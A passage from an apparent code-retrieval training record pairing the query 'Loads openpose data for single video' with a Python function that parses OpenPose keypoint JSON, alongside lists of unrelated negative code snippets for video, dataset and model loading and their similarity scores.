f'train_test_{feature_str}.pic')\n\t\telse:\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_dev_{feature_str}.pic')\n\t\t\t\n\t\t# Return saved features if exist:\n\t\tif not self.options.save_features and os.path.exists(f'{feature_path[0]}/{feature_path[1]}'):\n\t\t\tX_train, X_test = load_from_file(f'{feature_path[0]}/{feature_path[1]}')\n\t\telse:\n\t\t\tX_train, X_test = self.get_train_test()\n\t\t\t'''X_train, X_test = scale(X_train, X_test, scale_type='standard', axis=0, use_boxcox=True, boxcox_axis=0,\n\t\t\t use_pandas=True, verbose=self.options.verbose)'''\n\t\t\tX_train, X_test = scale(X_train, X_test, scale_type='minmax', axis=0, use_pandas=True,\n\t\t\t verbose=self.options.verbose)\n\t\t\tif self.fdhh:\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint('Performing FDHH over train and test set...')\n\t\t\t\tX_train = X_train.groupby(level=0).apply(self.FDHH)\n\t\t\t\tX_test = X_test.groupby(level=0).apply(self.FDHH)\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint(f'Sparsity in Train fdhh = {np.sum(X_train.values == 0) / X_train.size}')\n\t\t\t\t\tprint(f'Sparsity in Test fdhh = {np.sum(X_test.values == 0) / X_test.size}')\n\t\t\telse:\n\t\t\t\tX_train, X_test = self.video_pca(X_train, X_test)\n\t\t\t\t\n\t\tif self.options.save_features:\n\t\t\tsave_to_file(feature_path[0], feature_path[1], (X_train, X_test))\n\t\t\tself.options.save_features = False\n\t\t\n\t\tif not self.fdhh:\n\t\t\tX_train = self.split_videos(X_train)\n\t\t\tX_test = self.split_videos(X_test)\n\t\t\t\n\t\treturn [X_train, X_test]", "def load_data(self):\n overlength_num = title_num = 0\n with open(self.path, 'r', encoding='utf-8') as r:\n for line in r:\n inst = json.loads(line)\n is_title = inst['sent_id'].endswith('-3') and inst['tokens'][-1] != '.'\n if self.ignore_title and is_title:\n title_num += 1\n continue\n\n # TODO: add back coarse type\n for event in inst['event_mentions']:\n event_type = event['event_type']\n if ':' in event_type:\n event['event_type'] = event_type.split(':')[1].upper()\n self.data.append(inst)\n\n if title_num:\n print('Discarded {} titles'.format(title_num))\n print('Loaded {} instances from {}'.format(len(self), self.path))", "def crosslyGenerateFrames(self):\n fail = set()\n try:\n while self.alive:\n for name, video in self._videos.items():\n video: cv2.VideoCapture\n success, frame = video.read()\n if self.longFirst:\n if len(fail) == len(self._videos): # 长视频优先,视频长度由最长决定\n return\n elif not success:\n print(f'Read {name} Over')\n fail.add(video)\n else:\n yield frame\n else:\n if success: # 短视频优先,视频长度由最短决定\n yield frame\n else:\n return\n print('Reading Completed!')\n except Exception as e:\n raise e\n finally:\n self.close()", "def WLASL_parcours():\n path = \"/home/nmiguens/Datasets/WLASL\"\n write_txt(\"\\n\" + \"---------------------------- \\n\" + \"Nouveau processus \\n\")\n nb_video = 0\n with open(r\"{}\".format(path + \"/start_kit/WLASL_v0.3.json\"), \"r\") as read_file:\n WLASL = json.load(read_file)\n for glosses in WLASL:\n for instance in glosses[\"instances\"]:\n inputVideo = os.path.join(path, \"videos/\" + instance[\"video_id\"] +\".mp4\")\n if os.path.exists(inputVideo):\n if not os.path.exists(\"/home/nmiguens/JSON/WLASL/{}_{}.json\".format(glosses[\"gloss\"], instance[\"instance_id\"])):\n videoDict = video_to_dict(inputVideo, 0, -1) #instance[\"frame_start\"], instance[\"frame_end\"])\n dict_to_json(videoDict, glosses[\"gloss\"], instance[\"instance_id\"])\n nb_video = len(os.listdir(\"/home/nmiguens/JSON/WLASL\")) - nb_video \n message = \"{} vidéos traitées pour la classe {}\".format(nb_video, glosses[\"gloss\"])\n write_txt(message)\n return 0", "def getvideolist():\n safeprint(\"Getting video list...\")\n response = getfile(\"http://openings.moe/api/list.php\")\n lstjson = response.read().decode(\"utf-8\", \"ignore\")\n videolist = json.loads(lstjson)\n return videolist", "def loadData(path,filename):\n\tfilepath = path + filename\n\ttry:\n\t\t#print('try1')\n\t\twith open(filepath+\".pickle\",\"rb\") as handle:\n\t\t\tallVideoData = pickle.load(handle)\n\t\ttry:\n\t\t\tmetadata = allVideoData[0]\n\t\t\tdata = allVideoData[1]\n\t\texcept:\n\t\t\tmetadata = allVideoData\n\t\t\tdata = __initializeData()\n\t\t\tprint(\"WARNING\")\n\t\t\tprint(\"warning: no data attached to metadata, initializing empty set\")\n\t\t\ttime.sleep(1)\n\t\treturn metadata,data\n\texcept:\n\t\tprint('no file {} exists yet'.format(filepath+\".pickle\"))\n\t\tprint('if writeMetadata has already been used, be sure to save it with saveData()')\n\t\ttime.sleep(1)\n\t\tmetadata = False\n\t\treturn metadata,__initializeData()", "def get_data(self):\n global CAM\n while CAM.isOpened():\n _, frame = CAM.read()\n _, jpeg = cv2.imencode('.jpg', frame)\n encoded_img = \"data:image/jpg;base64,\" + str(base64.b64encode(jpeg.tobytes()).decode())\n SIO.emit('video_frame',\n {'frame': encoded_img},\n namespace='/live-stream')\n sleep(self.delay)", "def video_optimization(dataset: LiveCapAdapter, energy: Energy, initial_pose: ndarray,\n n_frames=-1, verbose=True) -> ndarray:\n if n_frames <= 0:\n n_frames = len(dataset)\n if verbose:\n print(f'running video_optimization for {n_frames} frames...')\n\n pose_list = []\n pose = initial_pose\n\n for i in range(n_frames):\n if verbose:\n print(f'estimating pose in frame {i} out of {n_frames}...')\n\n entry = dataset[i]\n pose = frame_optimization(entry, pose, energy)\n pose_list.append(pose)\n\n if verbose:\n print('finished video optimization.')\n\n return np.array(pose_list)", "def load(self):\n Logger.info(\"VLCPlayer: Entering load\")\n self._load_player(self.source)\n self._set_volume(self.volume)", "def DataLoader(data_place):\n # Nd = []\n # Np = []\n # Nz = []\n # channel_num = []\n # images = []\n # id_labels = []\n # pose_labels = []\n\n # mycase\n # Nz = 50\n # channel_num = 3\n # images = np.load('{}/images.npy'.format(data_place))\n # id_labels = np.load('{}/ids.npy'.format(data_place))\n # pose_labels = np.load('{}/yaws.npy'.format(data_place))\n #\n # Np = int(pose_labels.max() + 1)\n # Nd = int(id_labels.max() + 1)\n #\n # return [images, id_labels, pose_labels, Nd, Np, Nz, channel_num]\n\n # mycase MultiPIE\n Nz = 50\n channel_num = 3\n image_attributes_df = pd.read_csv(data_place)\n\n Nd = int(np.max(image_attributes_df['Id'])+1)\n Np = int(np.max(image_attributes_df['pose'])+1)\n Ni = int(np.max(image_attributes_df['illum'])+1)\n\n return [image_attributes_df, Nd, Np, Ni, Nz, channel_num]", "def load_vox(data: pd.DataFrame, in_place: bool = False):\n if not in_place:\n mod = data.copy()\n else:\n mod = data\n clips = []\n channels = []\n samplerates = []\n durations = []\n for i, row in mod.iterrows():\n sys.stdout.write(f\"\\r[-] Reading: {i} of {len(mod)} ({i / len(mod) * 100: .2f}%)\")\n sys.stdout.flush()\n with audioread.audio_open(row['file']) as f:\n channels.append(f.channels)\n samplerates.append(f.samplerate)\n durations.append(f.duration)\n data = bytearray()\n for buf in f:\n data = data + buf\n clips.append(data)\n sys.stdout.write(f\"\\r[ ] Read {len(mod)} files into DataFrame.\\r\\n\")\n sys.stdout.flush()\n mod['audio'] = pd.Series(clips)\n mod['channels'] = pd.Series(channels)\n mod['samplerate'] = pd.Series(samplerates)\n mod['duration'] = pd.Series(durations)\n return mod", "def get_frame_list(self):\r\n\r\n logger.debug('Executing frame extraction')\r\n\r\n frames_loaded = False\r\n\r\n # Try to load YAML file with frame list\r\n if os.path.exists(self.frames_file_path):\r\n\r\n print 'Loading YAML file with frame list'\r\n logger.debug('Loading YAML file with frame list')\r\n\r\n f_list = utils.load_YAML_file(self.frames_file_path)\r\n\r\n if f_list:\r\n self.frame_list = f_list\r\n\r\n print 'YAML file with frame_list loaded'\r\n logger.debug('YAML file with frame_list loaded')\r\n\r\n frames_loaded = True\r\n\r\n if not frames_loaded:\r\n\r\n print '\\n\\n### Frame extraction ###\\n'\r\n logger.debug('\\n\\n### Frame extraction ###\\n')\r\n\r\n # Save processing time\r\n start_time = cv2.getTickCount()\r\n\r\n if not (os.path.exists(self.frames_path)):\r\n os.makedirs(self.frames_path)\r\n\r\n # Counter for all frames\r\n frame_counter = 0\r\n\r\n # Value of frame_counter for last analyzed frame\r\n last_anal_frame = 0\r\n\r\n # Open video file\r\n capture = cv2.VideoCapture(self.resource_path)\r\n\r\n self.frame_list = []\r\n\r\n # Save parameters for this video\r\n param_dict = {}\r\n\r\n if capture is None or not capture.isOpened():\r\n\r\n error = 'Error in opening video file'\r\n\r\n print error\r\n logger.debug(error)\r\n\r\n return\r\n\r\n else:\r\n\r\n video_fps = capture.get(cv2.cv.CV_CAP_PROP_FPS)\r\n\r\n param_dict[c.VIDEO_FPS_KEY] = video_fps\r\n\r\n # Original number of frames\r\n tot_frames = capture.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT)\r\n\r\n param_dict[c.VIDEO_TOT_FRAMES_KEY] = tot_frames\r\n\r\n self.fps = video_fps\r\n\r\n self.video_frames = float(tot_frames)\r\n\r\n # Saved frames\r\n saved_frames = 0\r\n\r\n while True:\r\n\r\n # Read frame\r\n ret, frame = capture.read()\r\n\r\n # If no frame is read, abort\r\n if not ret:\r\n break\r\n\r\n used_fps = c.USED_FPS\r\n use_or_fps = c.USE_ORIGINAL_FPS\r\n use_or_res = c.USE_ORIGINAL_RES\r\n used_res_scale_factor = c.USED_RES_SCALE_FACTOR\r\n\r\n if self.params is not None:\r\n\r\n if c.USED_FPS_KEY in self.params:\r\n used_fps = self.params[c.USED_FPS_KEY]\r\n\r\n if c.USE_ORIGINAL_FPS_KEY in self.params:\r\n use_or_fps = self.params[c.USE_ORIGINAL_FPS_KEY]\r\n\r\n if c.USE_ORIGINAL_RES_KEY in self.params:\r\n use_or_res = self.params[c.USE_ORIGINAL_RES_KEY]\r\n\r\n if c.USED_RES_SCALE_FACTOR_KEY in self.params:\r\n used_res_scale_factor = self.params[\r\n c.USED_RES_SCALE_FACTOR_KEY]\r\n\r\n # Next frame to be analyzed\r\n next_frame = last_anal_frame + (video_fps / used_fps) - 1\r\n\r\n if use_or_fps or (frame_counter > next_frame):\r\n\r\n # Frame position in video in milliseconds\r\n elapsed_ms = capture.get(cv2.cv.CV_CAP_PROP_POS_MSEC)\r\n\r\n # print 'elapsed video s =', elapsed_video_s\r\n\r\n fr_name = '%07d.png' % frame_counter\r\n\r\n frame_path = os.path.join(self.frames_path, fr_name)\r\n\r\n # Resize frame\r\n if not use_or_res:\r\n fx = used_res_scale_factor\r\n\r\n fy = used_res_scale_factor\r\n\r\n interp = cv2.INTER_AREA\r\n\r\n frame = cv2.resize(src=frame, dsize=(0, 0),\r\n fx=fx, fy=fy,\r\n interpolation=interp)\r\n\r\n cv2.imwrite(frame_path, frame,\r\n [cv.CV_IMWRITE_PNG_COMPRESSION, 0])\r\n\r\n frame_dict = {c.SAVED_FRAME_NAME_KEY: fr_name,\r\n c.ELAPSED_VIDEO_TIME_KEY: int(elapsed_ms)}\r\n\r\n self.frame_list.append(frame_dict)\r\n\r\n last_anal_frame = frame_counter\r\n\r\n saved_frames += 1\r\n\r\n frame_counter += 1\r\n\r\n self.progress = 100 * (frame_counter / self.video_frames)\r\n\r\n print('progress: ' + str(self.progress) + ' % \\r'),\r\n\r\n del capture\r\n\r\n self.saved_frames = float(saved_frames)\r\n\r\n param_dict[c.VIDEO_SAVED_FRAMES_KEY] = self.saved_frames\r\n\r\n # Save frame list in YAML file\r\n utils.save_YAML_file(self.frames_file_path, self.frame_list)\r\n\r\n # Save video parameters in YAML file\r\n\r\n utils.save_YAML_file(self.params_file_path, param_dict)\r\n\r\n # Save processing time\r\n time_in_clocks = cv2.getTickCount() - start_time\r\n time_in_seconds = time_in_clocks / cv2.getTickFrequency()\r\n\r\n print 'Time for frame extraction:', str(time_in_seconds), 's\\n'\r\n logger.debug(\r\n 'Time for frame extraction:', str(time_in_seconds), 's\\n')\r\n\r\n self.anal_times[c.FRAME_EXTRACTION_TIME_KEY] = time_in_seconds\r\n\r\n utils.save_YAML_file(self.analysis_file_path, self.anal_times)", "def get_videos(self):\n return list(self._videos.values())", "def _load_data(self):\n\n if not self._cache.exists(config.DATAFRAME_SONG_DATA):\n source_path = os.path.join(config.S3_SONG_DATA, 'A/A/A/*.json') # Note: song database is way big, so we get only a slice of it.\n dataframe = self._get_spark_session().read.json(source_path)\n self._cache.set_source(config.DATAFRAME_SONG_DATA, dataframe)", "def load_top_video(self):\n\n if self.general_parser is None or \\\n self.specific_parser is None or \\\n ((self.video_parser is None) and (self.video_data_parser is None)):\n self.missing_files_label.grid(row=13, column=5)\n raise Exception(\"you need to load the general, month-specific, and video words first\")\n else:\n self.missing_files_label.grid_remove()\n\n if self.month_selected is None:\n self.no_month_selected_label.grid(row=14, column=5, columnspan=1)\n else:\n self.no_month_selected_label.grid_remove()\n\n self.top_unique_video = self.find_top_unique(self.video_entries,\n int(self.top_unique_video_entry.get()))\n\n self.top_unique_video_box.delete(0, END)\n\n box_count = 0\n for rank, words in enumerate(self.top_unique_video):\n for index, word in enumerate(words):\n self.top_unique_video_box.insert(box_count,\n str(word.rank)+ \". \" +\n word.word +\n \" - \" + str(word.count))\n box_count += 1\n\n self.unique_video_found = True", "def imdb_load():\n for root, dirs, filenames in os.walk(os.path.dirname(__file__) + \"/imdb\"):\n for file_name in filenames:\n if file_name.find(\".json\") > 0:\n Movie.imdb_load_file(os.path.dirname(__file__) + \"/imdb/\" + file_name)\n return Movie.__movies", "def load_data(self):\n if self.debug:\n print(\"Loading data\")", "def ordinarilyGenerateFrames(self):\n for name, video in self._videos.items():\n print(f'Reading:{name}...')\n success, frame = video.read()\n while self.alive and success:\n yield frame\n success, frame = video.read()\n print('Reading Completed!')\n self._videos.clear()", "def load_vets():\n\n print(\"Vets\")\n\n Vet.query.delete()\n\n with open(\"seed_data/vet_seed.psv\") as vets:\n for row in vets:\n user_id, grad_year, specialty = row.strip().split(\"|\")\n\n vet = Vet(\n user_id = user_id,\n grad_year = datetime.datetime.strptime(grad_year, \"%d-%b-%Y\"),\n specialty = specialty\n )\n\n db.session.add(vet)\n\n db.session.commit()", "def load_data(self):\n if os.path.isfile(_POSPKL):\n with open(_POSPKL, 'rb') as fpkl:\n dat = pickle.load(fpkl)\n for name, obj in self.toplevel_wins.iteritems():\n if dat.get(name, None):\n obj.set_position(*dat[name])", "def video_files():\n p = parse_cmdline(get_parser=get_parser_files)\n log.setup_main_handler(\n mods=(\"fogtools\", \"typhon\", \"fogpy\", \"sattools\", \"fcitools\", \"satpy\",\n \"pyresample\"),\n level=logging.INFO)\n vis.show_video_abi_glm(\n files=p.files,\n img_out=p.filename_pattern_image,\n vid_out=p.filename_pattern_video,\n out_dir=p.outdir)\n print(\"Files written to:\", p.outdir)", "def data_video_dictionary(train_names):\n length=0 # to check the length of total dataset\n dict_videos= {}\n for name in train_names: \n dict_images={} \n for i in range(len(os.listdir(\"../dataset/data/\"+name))): \n dict_images[str(i)]= cv.imread(\"../dataset/data/\"+name+\"/frame00\"+\"{:02d}\".format(i)+\".png\",cv.IMREAD_GRAYSCALE)\n \n length=length+len(dict_images)\n dict_videos[name]=dict_images\n #what I am doing here is error checking, can do this professionally also..do it after experiments..\n print(\"Length of total dataset, should be 21100 :\"+ str(length)) \n return dict_videos", "def get_video(soup, data, dictionary):\n video_markup = [] \n VIDEOS_TAGS = ['iframe', 'embed', 'object', 'video']\n VIDEO_PROVIDERS = ['youtube', 'vimeo', 'dailymotion', 'kewego']\n #print \",\".join(VIDEOS_TAGS)\n for t in VIDEOS_TAGS:\n if soup.find_all(t):\n for vid in soup.find_all(t):\n # youtube og vimeo kan avsløres ver src atributt til iframe tag\n #print vid\n for prov in VIDEO_PROVIDERS:\n if prov in vid['src']:\n video_markup.append(vid)\n\n #print video_markup \n #print \"antall videoer (ikke nrk): \", len(video_markup)\n\n # nrk-videoer (lastet via js, og må trikses med)\n # ser ut som eksistensen av en data-video-id=\"118648\" kan være en bedre indikator.. \n nrk_videoer = soup.select('figure.video')\n #print \"antall nrk-videoer: \", len(nrk_videoer)\n\n\n dictionary['video_files'] = len(video_markup)\n dictionary['video_files_nrk'] = len(nrk_videoer)\n return", "def _load_processed_data(self):\n with open(os.path.join(self._data_root_path, self._processed_train_data_file_name),\n 'r') as f:\n train_examples = json.load(f)\n\n with open(os.path.join(self._data_root_path, self._processed_dev_data_file_name), 'r') as f:\n dev_examples = json.load(f)\n\n with open(os.path.join(self._data_root_path, self._word_vocab_file_name), 'r') as f:\n word_vocab = Vocab.from_json(json.load(f))\n\n with open(os.path.join(self._data_root_path, self._char_vocab_file_name), 'r') as f:\n char_vocab = Vocab.from_json(json.load(f))\n\n return train_examples, dev_examples, word_vocab, char_vocab", "def load(self):\n\n\t\t# Check if dataset location exists\n\t\tif (not os.path.exists(self._location)):\n\t\t\tprint(\"Error: Dataset location does not exist\")\n\t\t\treturn\n\n\t\tself._frames = sorted(glob.glob(self._location + '/frame*.jpg'))\n\n\t\t# Check if startFrame is beyond dataset bounds\n\t\tif (self._startFrame > len(self._frames)):\n\t\t\tprint(\"Error: Start frame is beyond dataset bounds\")\n\t\t\treturn\n\n\t\t# Check if endFrame is beyond dataset bounds\n\t\tif (self._endFrame > len(self._frames)):\n\t\t\tprint(\"Warning: End frame beyond dataset bounds, setting to end of dataset\")\n\n\t\t# Start buffering threads\n\t\tself._bufferThreadStopped = False\n\t\tself._bufferingThread.start()", "def _load_data(self):\n self.mapper = Mapper()\n self.mapper.generate_vocabulary(self.review_summary_file)\n self.X_fwd, self.X_bwd, self.Y = self.mapper.get_tensor(reverseflag=True)\n # Store all the mapper values in a dict for later recovery\n self.mapper_dict = dict()\n self.mapper_dict['seq_length'] = self.mapper.get_seq_length()\n self.mapper_dict['vocab_size'] = self.mapper.get_vocabulary_size()\n self.mapper_dict['rev_map'] = self.mapper.get_reverse_map()\n # Split into test and train data\n self._split_train_tst()", "def get_videos_in_playlist(self):\n\n self.ydl = youtube_dl.YoutubeDL()\n # uses the youtube_dl as a context manager\n with self.ydl:\n self.result = self.ydl.extract_info(\n self.url, extra_info={'listformats': True}, download=False)\n for video in (self. result['entries']):\n video_id = video['id']\n self. url = f'https://www.youtube.com/watch?v={video_id}'\n self. show_formats()", "def load(cls):\n playerdata = Data.raw_load(\"savedata.dat\")\n for key in playerdata:\n cls.name = playerdata[\"name\"]\n cls.max_hp = playerdata[\"max_hp\"]\n cls.hp = playerdata[\"hp\"]\n cls.lv = playerdata[\"lv\"]\n cls.exp = playerdata[\"exp\"]\n cls.atk = playerdata[\"atk\"]\n cls._def = playerdata[\"_def\"]\n cls.inventory = playerdata[\"inventory\"]\n cls.pin = playerdata[\"pin\"]", "def run_all(movie_name):\n s = time.time()\n panorama_generator = sol4.PanoramicVideoGenerator('dump/%s/' % movie_name, movie_name, 2100)\n panorama_generator.align_images(translation_only=False)\n panorama_generator.generate_panoramic_images(9)\n print(' time for %s: %.1f' % (movie_name, time.time() - s))\n panorama_generator.save_panoramas_to_video()", "def load_data(self):\n\n self._load_train_data()\n self._load_test_data()", "def initialize_vids(CONFIG_PARAMS, datadict, e, vids, pathonly=True):\n for i in range(len(CONFIG_PARAMS[\"experiment\"][e][\"camnames\"])):\n # Rather than opening all vids, only open what is needed based on the\n # maximum frame ID for this experiment and Camera\n flist = []\n for key in datadict.keys():\n if int(key.split(\"_\")[0]) == e:\n flist.append(\n datadict[key][\"frames\"][\n CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]\n ]\n )\n\n flist = max(flist)\n\n # For COM prediction, we don't prepend experiment IDs\n # So detect this case and act accordingly.\n basecam = CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]\n if \"_\" in basecam:\n basecam = basecam.split(\"_\")[1]\n\n if CONFIG_PARAMS[\"vid_dir_flag\"]:\n addl = \"\"\n else:\n addl = os.listdir(\n os.path.join(CONFIG_PARAMS[\"experiment\"][e][\"viddir\"], basecam,)\n )[0]\n r = generate_readers(\n CONFIG_PARAMS[\"experiment\"][e][\"viddir\"],\n os.path.join(basecam, addl),\n maxopt=flist, # Large enough to encompass all videos in directory.\n extension=CONFIG_PARAMS[\"experiment\"][e][\"extension\"],\n pathonly=pathonly,\n )\n\n if \"_\" in CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]:\n vids[CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]] = {}\n for key in r:\n vids[CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]][\n str(e) + \"_\" + key\n ] = r[key]\n else:\n vids[CONFIG_PARAMS[\"experiment\"][e][\"camnames\"][i]] = r\n\n return vids", "def load_openml_data():\n datasets = dict()\n files = os.listdir(_DATA_DIRECTORY.value)\n for file_name in files:\n with open(_DATA_DIRECTORY.value + file_name, \"r\") as ff:\n task = np.loadtxt(ff, delimiter=\",\", skiprows=1)\n np.random.shuffle(task)\n datasets[file_name] = [task]\n return datasets, files", "def print_data():\r\n print(\"\\n\\n*** Loaded data:\")\r\n if \"defaultdirectory\" in data:\r\n print(\"*** Default video source directory:\", data[\"defaultdirectory\"])\r\n for key in sorted(data):\r\n if key != \"defaultdirectory\":\r\n print(\"{} --> {}\".format(key, data[key]))", "def load_movies():\n print \"Movies\"\n\n # Delete all rows in table, so if we need to run this a second time,\n # we won't be trying to add duplicate users\n Movie.query.delete()\n\n # Read u.item file and insert data\n for row in open(\"seed_data/u.item\"):\n row =row.rstrip()\n\n movie_id, title_long, released_string, imdb_url = row.split(\"|\")[:4]\n #we modified the datetime format changed released_string into \n #new format by using datetim.strptime to convert it. \n print row\n if released_string: \n release_at = datetime.strptime(released_string, \"%d-%b-%Y\")\n else: \n release_at = None \n\n #here we stripped the title of the (xxxx) year and parenthesis\n #using the slice method. \n title = title_long[:-7]\n\n print movie_id, title_long, released_string, imdb_url\n\n #assign the return values from our for loop to a new variable\n movie = Movie(movie_id=movie_id, title=title, released_at=release_at,\n imdb_url=imdb_url)\n \n # We need to add to the session or it won't ever be stored\n db.session.add(movie)\n\n #Once we're done, we should commit our work\n db.session.commit()", "def load_parameters(self, session, data_dict):\n for layer in self.layers:\n layer.load_parameters(session, data_dict)" ]
[ "0.7148177", "0.6771924", "0.6767525", "0.6552482", "0.6189131", "0.61795473", "0.61142415", "0.6013824", "0.5968695", "0.5942266", "0.5874326", "0.58726317", "0.5843663", "0.5814855", "0.5791894", "0.5758234", "0.57317847", "0.5715237", "0.57054555", "0.57054555", "0.5681245", "0.56790996", "0.5656687", "0.56404597", "0.56380755", "0.5630887", "0.5630127", "0.5618003", "0.56134325", "0.56090385", "0.5595797", "0.55924666", "0.5582189", "0.556542", "0.5554816", "0.55530727", "0.5475096", "0.5438108", "0.54274356", "0.5420369", "0.54123324", "0.53880584", "0.5386119", "0.5377482", "0.53632677", "0.5331168", "0.5318671", "0.53113735", "0.5287092", "0.5280745", "0.526982", "0.5255968", "0.52535266", "0.52479845", "0.5245657", "0.52354854", "0.52282053", "0.5223881", "0.51991004", "0.51908034", "0.518102", "0.518102", "0.51518303", "0.5150591", "0.5149898", "0.5138407", "0.51322806", "0.5132151", "0.51266533", "0.51169014", "0.51164836", "0.5115762", "0.511331", "0.511026", "0.5092588", "0.5086553", "0.5085624", "0.5081877", "0.50796497", "0.5073729", "0.50706434", "0.50591016", "0.5052296", "0.5045267", "0.50420797", "0.50397205", "0.50306207", "0.50252134", "0.5024246", "0.5023197", "0.5020013", "0.50156975", "0.50150526", "0.50131774", "0.50086355", "0.50020933", "0.4999122", "0.49849138", "0.49844182", "0.49826887" ]
0.6053022
7
Loads openpose data for single video.
def load_op_data(path_to_json, vm, person_metric="largest_bbox"): frame_list = [] keypoint_files = [os.path.join(path_to_json, pos_json) for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')] for js in keypoint_files: with open(js) as json_file: keypoint_data = json.load(json_file) # preprocess keypoint data per person detected (list of all coords --> dict of parts to coords) max_bbox_sz = 0 #TODO (see below todo) selected_part_data = {} for person_id in range(len(keypoint_data['people'])): pose_keypoints_2d = keypoint_data['people'][person_id]['pose_keypoints_2d'] part_data = {} for index in INDEX_TO_PART:# transform keypoint unstructured list into dictionary of parts keypoint_index = index * POINTS_PER_PART part_data[index] = pose_keypoints_2d[keypoint_index : keypoint_index + POINTS_PER_PART] if len(part_data[index]) != 0: #normalize part_data[index][0] /= vm.width part_data[index][1] /= vm.height else: part_data[index] = [0, 0, 0] # select person w/ largest bbox # TODO: change to more generalized metric if needed; just change this snippet plus max_bbox_sz declaration above if person_metric == "largest_bbox": curr_bbox_sz = get_bbox_size(part_data) elif person_metric == "rightmost_bbox": curr_bbox_sz = get_bbox_maxpt(part_data) if curr_bbox_sz > max_bbox_sz: max_bbox_sz = curr_bbox_sz selected_part_data = part_data if len(keypoint_data['people']) == 0: # no people detected in this frame, set all values in frame to zero selected_part_data = {part_index: [0, 0, 0] for part_index in range(len(INDEX_TO_PART)) } frame_list.append(selected_part_data) return frame_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _loadData(self, data):\n Movie._loadData(self, data)\n PlexSession._loadData(self, data)", "def __loadVideo(self):\n # Check if movie file exists ...\n #\n if not(os.path.isfile(self.fNameVideo)):\n return stm.StimErrC.videoFileNotFound\n\n try: \n # Load video\n #\n self.video = mpe.VideoFileClip(self.fNameVideo)\n \n except IOError: \n return stm.StimErrC.invalidVideoFormat\n \n # Retrieve video description\n #\n self.dxFr = self.video.size[0]\n self.dyFr = self.video.size[1]\n self.nFr = self.video.duration *self.video.fps\n self.fps = self.video.fps\n ssp.Log.write(\"DEBUG\", \"stim_video: {0}x{1} pixel, {2} frames, {3} fps\"\n .format(self.dxFr, self.dyFr, self.nFr, self.fps))\n \n if self.isTestOnly:\n # Return here if the video was only loaded to test if it is ok\n #\n self.video = None\n return stm.StimErrC.ok\n \n # Load movie frames (note that frames is a generator!)\n #\n self.frames = self.video.iter_frames() \n self.isReady = True\n return stm.StimErrC.ok", "def load_pycon_data(pycon_videos=pycon_videos):\r\n with open(pycon_videos, 'rb') as fd:\r\n return pickle.load(fd)", "def load_pycon_data(pycon_videos: str):\n p_data = None\n with open(pycon_videos, 'rb') as pickle_file:\n p_data = pickle.load(pickle_file)\n return p_data", "def load_video(self):\r\n if self.file_name=='':\r\n Tk().withdraw()\r\n self.file_name = askopenfilename()\r\n cap = cv2.VideoCapture(self.file_name)\r\n self.length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n self.width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n self.heigth = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n self.fps = int(round(cap.get(cv2.CAP_PROP_FPS)))\r\n \r\n video_buffer = []#np.ndarray(shape=(self.length, self.heigth, self.width, 3), dtype=np.uint8)\r\n for i in tqdm(range(self.length), desc='Loading video from: {}'.format(self.file_name)):\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n video_buffer.append(frame)\r\n #assert(i==self.length-1)\r\n video_buffer = np.array(video_buffer, dtype=np.uint8)\r\n self.video_buffer = video_buffer\r\n cap.release()\r\n self.ix = self.width-1\r\n self.iy = self.heigth-1 \r\n self.roi = dict(x1=self.x, y1=self.y, x2=self.ix, y2=self.iy)\r\n return video_buffer", "def _load_video(self, video):\n\t\timport cv2\n\t\tcap = cv2.VideoCapture(video)\n\t\tassert cap.get(cv2.CAP_PROP_FRAME_WIDTH) >= 100, 'width must be at least 100 pixels'\n\t\tassert cap.get(cv2.CAP_PROP_FRAME_HEIGHT) >= 100, 'height must be at least 100 pixels'\n\t\tn = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\t\tbuf = np.empty((n, int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)), int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), 3), np.dtype('uint8'))\n\t\ti, ret = 0, True\n\t\twhile (i < n and ret):\n\t\t\tret, frame = cap.read()\n\t\t\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\t\t\tbuf[i] = frame\n\t\t\ti += 1\n\t\tcap.release()\n\t\treturn np.moveaxis(buf, -1, 1)", "def load_video_data(self):\n self.file_videos = [\n Video.from_file(path, self)\n for path in self.video_dir.glob('*.json')\n ]", "def loadData(catalog):\n loadVideos(catalog)", "def _loadData(self, data):\n Episode._loadData(self, data)\n PlexSession._loadData(self, data)", "def onclick_load_video(self):\n video_source = select_file(\n \"Select Video Files\",\n \"../\",\n \"Video Files (*.mp4 *.avi *.mpg *.gif *.mov)\")\n if video_source:\n param_name = select_file(\n \"Select Parameter\", \"../\", \"Parameter Files (*.json)\")\n if param_name:\n self.moildev = Moildev(param_name)\n self.running_video(video_source)", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self._data = data\n self.addedAt = utils.toDatetime(data.attrib.get('addedAt'))\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.extraType = utils.cast(int, data.attrib.get('extraType'))\n self.index = utils.cast(int, data.attrib.get('index'))\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(\n data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.skipDetails = utils.cast(int, data.attrib.get('skipDetails'))\n self.subtype = data.attrib.get('subtype')\n self.thumbAspectRatio = data.attrib.get('thumbAspectRatio')\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.year = utils.cast(int, data.attrib.get('year'))", "def load_videos(self):\n logging.debug(\"Loading videos data...\")\n\n # loading videos\n data=requests.get(self.__URL_VIDEOS)\n self.__dataframe_videos=pd.DataFrame(data.json())\n # XXX transposing as the API returns a pre index list of videos\n self.__dataframe_videos = self.__dataframe_videos.transpose()\n if 